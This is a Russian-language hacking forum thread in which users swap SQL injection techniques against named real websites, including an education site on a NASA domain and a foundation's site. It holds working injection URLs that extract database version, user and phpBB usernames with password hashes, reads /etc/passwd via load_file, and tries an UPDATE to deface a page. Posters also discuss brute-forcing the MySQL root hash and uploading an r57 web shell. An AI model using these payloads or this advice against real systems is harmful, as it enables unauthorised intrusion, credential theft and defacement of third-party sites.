А если в чар перегнать, непоможет? Т Т.к. хрен подберёшь руками...Если права то есть, может просто фильтрация какаято стоит. И где можно в чар перевести в онлайне где нибудь. И ещё, если в выводимое поле (любое) ввести load_file('/etc/passwd') равно как и load_file(0x2f6574632f706173737764) , то это поле просто пропадает, остальные остаются. В случае с table_name в information_schema -пропадают все поля, тут же остальные остаются. Это значит, что кавычки не экранируются и если file_priv есть то можно залить шелл? И как узнать, есть ли file_priv? И если шелл можно залить только в корень, это в public_html выходит? В ошибке просто не видно пути через public_html.
у тебя file_priv нету, ибо проверить есть или нет попробовав прочитать любой файл, что ты и попробовал сделать выше Так же инфа о наличии файл прив хранится в таблице mysql.user Полный путь можно узнать например в гугле, вообще тут есть об этом статься от [cash]'a, ищи В чар переводить - не сработает. Ты вместо имён таблиц увидишь "table_name"
Так, У Велли проблема : ).Нашёл один проект,вскрыл,через schema_name узнал количество баз.Потом узнал,что на нём хостицо не один сайт,а когда потался вывести все те таблицы,что были в этой базе,в других базах не прокатило.).Есть ли какой-то вариант получения доступа к ним ?. о_О, и запрос если можно, как должно быть в идеале: )
видимо у юзера от кторого работает мускул нет прав на другие базы если есть доступ к mysql.user, выбирай оттуда пасс рута, бруть Когда сбрутишь или пробуй удалённо приконектиться к серваку или ищи на сайтах пшпмайадмин
В чём проблема то? Вывод есть: http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,version()--
Жалко....доступ туда закрыт.Остаёццо только расхешить.Ммм...Или подделать ид сессии*Ушёл искать скрипты*.
Вот так ещё лучше: _http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,null/* Вывод в <title> ,хотя, кому как удобнее
Нашел уязвимость...но бд ведет себя странно... 1.пробую group by , всё норм, 3 колонки... 2.пробую union select 1,2,3/* появляется ошибка... Подскажите,плз)
http://nasaexplores.nasa.gov/show_912_teacher_st.php?id=2'+or+1=(select+table_name+from+information_schema.tables+limit+1,1)/* Почему-то не эксплотируеццо,в лимитки подставляю любое число,то же самое.Что неправильно ? И вывода кстати нету)(
2†c0(aIn?† Там две колонки Вот вывод: _http://www.fondationbrigittebardot.fr/site/actu_en.php?id=75018+union+select+AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),version(),char(58),database()),0x71),0x71),2/*
Спасибо огромное,что помог.Кста,где можно почитать про спец.функции подобного рода или что-то типа этого?Перечитал все статьи [ cash ]'a,но про это ничего не нашел. ЗЫ:Буду ещё очень благодарен,если кто-нить подробно распишет,как залить шелл(например r57),инструкцию желательно в пм)
†c0(aIn?† Это просто один из вариантов обойти кодировку.Про MySql можешь почитать например сдесь: _http://phpclub.ru/mysql/doc/reference.html Статьи по скулям на форуме : _https://forum.antichat.ru/thread19605.html _https://forum.antichat.ru/thread43966.html
Скачай исходники MX-System и посмотри там, а вообще не думаю что в этой таблице будет что-то интересное, лучше смотри таблицу phpbb_users, http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat_ws(0x3a,username,user_password),3,4,5,null%20from%20phpbb_users%20limit%201,1/*
никак не могу проапдейтить: comments.php?news_id=-1+update+table.news+set+title='lol'+where+id='517'/* пишет You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update table.news set title='lol' where id='517'/*' at line 1 помогите, плз
